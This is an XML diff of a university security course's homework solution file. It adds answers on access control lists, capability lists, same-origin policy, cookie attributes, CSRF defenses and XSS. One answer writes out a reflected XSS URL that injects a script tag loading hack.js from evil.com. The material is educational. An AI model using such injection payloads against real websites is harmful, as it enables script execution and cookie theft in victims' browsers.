--- a/teaching/ITIS6200/2023fa/lectures/assignments/Homework3.solution.docx
+++ b/teaching/ITIS6200/2023fa/lectures/assignments/Homework3.solution.docx
@@ -245,6 +245,21 @@
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
         </w:rPr>
+        <w:t xml:space="preserve">Ans: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
         <w:t xml:space="preserve">x -&gt; [Alice: </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -274,38 +289,14 @@
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
         </w:rPr>
-        <w:t>y -&gt; [</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Alice: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t>r</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t xml:space="preserve">; Bob: </w:t>
+        <w:t xml:space="preserve">y -&gt; [Alice: r; Bob: </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
         </w:rPr>
-        <w:t>r</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t>w</w:t>
+        <w:t>rw</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -327,25 +318,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
         </w:rPr>
-        <w:t>z</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -&gt; [Alice: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t>x</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t>]</w:t>
+        <w:t>z -&gt; [Alice: x]</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -376,6 +349,21 @@
       </w:r>
       <w:r>
         <w:t>Write a set of capability lists for this situation. With what is each list associated?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ans: </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -650,6 +638,12 @@
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
         </w:rPr>
+        <w:t xml:space="preserve">Ans: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
         <w:t>Yes. Same protocol, domain, and ports</w:t>
       </w:r>
     </w:p>
@@ -690,6 +684,12 @@
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
         </w:rPr>
+        <w:t xml:space="preserve">Ans: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
         <w:t>No, different domain</w:t>
       </w:r>
     </w:p>
@@ -713,19 +713,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>https://cci.charlotte.e</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>d</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>u:443</w:t>
+          <w:t>https://cci.charlotte.edu:443</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -738,6 +726,12 @@
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ans: </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
@@ -780,25 +774,13 @@
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
         </w:rPr>
-        <w:t>No,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t xml:space="preserve">different </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t>protocol</w:t>
+        <w:t xml:space="preserve">Ans: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>No, different protocol</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -869,7 +851,27 @@
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
         </w:rPr>
-        <w:t xml:space="preserve">Set the domain attribute to </w:t>
+        <w:t xml:space="preserve">Ans: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Set the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>domain</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> attribute to </w:t>
       </w:r>
       <w:hyperlink r:id="rId12" w:history="1">
         <w:r>
@@ -942,12 +944,19 @@
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Ans: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
         <w:t xml:space="preserve">Set the </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>https</w:t>
       </w:r>
@@ -1045,6 +1054,12 @@
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
         </w:rPr>
+        <w:t xml:space="preserve">Ans: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
         <w:t>Create a cookie</w:t>
       </w:r>
       <w:r>
@@ -1089,7 +1104,31 @@
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
         </w:rPr>
-        <w:t xml:space="preserve">The cookie will be passed to requests to </w:t>
+        <w:t xml:space="preserve">The cookie will be </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>attached</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve">HTTP </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve">requests to </w:t>
       </w:r>
       <w:hyperlink r:id="rId18" w:history="1">
         <w:r>
@@ -1318,6 +1357,12 @@
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
         </w:rPr>
+        <w:t xml:space="preserve">Ans: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
         <w:t>The cookie for [username</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
@@ -1332,19 +1377,26 @@
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
         </w:rPr>
-        <w:t xml:space="preserve"> would affect github.com</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve"> would </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve">not </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>affect github.com</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1665,6 +1717,12 @@
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ans: </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
@@ -2063,6 +2121,13 @@
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Ans: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
         <w:t xml:space="preserve">If the chat has domain evil.com: the attack won’t succeed, since the cookie would not be attached.  </w:t>
       </w:r>
     </w:p>
@@ -2078,45 +2143,8 @@
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>If the chat has domain evil.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t>bank.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t>com: the attack w</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ould </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t>succeed</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, since the cookie would not be attached. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
+        <w:t xml:space="preserve">If the chat has domain evil.bank.com: the attack would succeed, since the cookie would not be attached. </w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2283,6 +2311,125 @@
       <w:pPr>
         <w:spacing w:line="276" w:lineRule="auto"/>
         <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ans: If the chat has domain evil.com: the attack won’t succeed, since the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>Referer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> head would </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>be ”</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>evil.com”, and doesn’t match “bank.com”;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve">If the chat has domain evil.bank.com: the attack would succeed, since the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>Referer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> head would </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>be ”</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve">evil.bank.com”, and </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>it contains</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> “bank.com”;  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
       </w:pPr>
     </w:p>
     <w:p>
@@ -2435,21 +2582,6 @@
       <w:r>
         <w:t xml:space="preserve">?  </w:t>
       </w:r>
-      <w:r>
-        <w:t xml:space="preserve">Give one drawback of setting </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>SameSite</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">=strict. </w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2464,6 +2596,60 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ans: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve">both </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>attack</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> won’t succeed, since </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>their origin evil or evil.bank.com doesn’t exactly match bank.com</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:autoSpaceDE w:val="0"/>
         <w:autoSpaceDN w:val="0"/>
         <w:adjustRightInd w:val="0"/>
@@ -2563,12 +2749,18 @@
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
         </w:rPr>
-        <w:t xml:space="preserve">A </w:t>
+        <w:t>A website uses a</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
         </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
         <w:t xml:space="preserve">Go </w:t>
       </w:r>
       <w:r>
@@ -2621,7 +2813,13 @@
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
         </w:rPr>
-        <w:t xml:space="preserve">takes an argument of name: </w:t>
+        <w:t>takes an argument of name</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. The website is vulnerable to XSS attacks. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3361,7 +3559,74 @@
         <w:autoSpaceDN w:val="0"/>
         <w:adjustRightInd w:val="0"/>
         <w:spacing w:line="276" w:lineRule="auto"/>
-      </w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ans: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>https://vulnerable.com/hello</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>?name=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>&lt;script</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>src</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>=”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>http://evil.com/hack.js</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>&gt;&lt;/script&gt;</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3370,28 +3635,6 @@
         <w:adjustRightInd w:val="0"/>
         <w:spacing w:line="276" w:lineRule="auto"/>
       </w:pPr>
-      <w:r>
-        <w:t>Q 4.</w:t>
-      </w:r>
-      <w:r>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">When the script </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>hack.js</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> runs, what origin does it has? </w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3399,10 +3642,29 @@
         <w:autoSpaceDN w:val="0"/>
         <w:adjustRightInd w:val="0"/>
         <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-        </w:rPr>
-      </w:pPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Q 4.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">When the script </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>hack.js</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> runs, what origin does it has? </w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3411,14 +3673,20 @@
         <w:adjustRightInd w:val="0"/>
         <w:spacing w:line="276" w:lineRule="auto"/>
         <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Q 4.3: Can we use XSS to steal information in Cookies? If yes, how can we defend against that? </w:t>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ans: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
+        </w:rPr>
+        <w:t>evil.com</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3446,6 +3714,34 @@
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
         </w:rPr>
+        <w:t xml:space="preserve">Q 4.3: Can we use XSS to steal information in Cookies? If yes, how can we defend against that? </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+        </w:rPr>
         <w:t>Q 4.</w:t>
       </w:r>
       <w:r>
@@ -3858,6 +4154,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
@@ -4639,7 +4936,6 @@
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Q 5.1: Design an input that would delete the record whose </w:t>
       </w:r>
       <w:r>

--- a/teaching/ITIS6200/2023fa/lectures/assignments/Homework3.solution.docx
+++ b/teaching/ITIS6200/2023fa/lectures/assignments/Homework3.solution.docx
@@ -395,7 +395,6 @@
         <w:t xml:space="preserve">; </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
@@ -403,7 +402,6 @@
         <w:t>y:r</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
@@ -440,7 +438,6 @@
         <w:t>Bob -&gt; [</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
@@ -448,7 +445,6 @@
         <w:t>x:r</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Optima" w:hAnsi="Optima"/>
@@ -1222,17 +1218,8 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>[username</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>].github.io</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>[username].github.io</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
@@ -1302,30 +1289,14 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>[username</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t>[username].github</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>].github</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>.com</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>?</w:t>
+        <w:t>.com?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1363,21 +1334,7 @@
         <w:rPr>
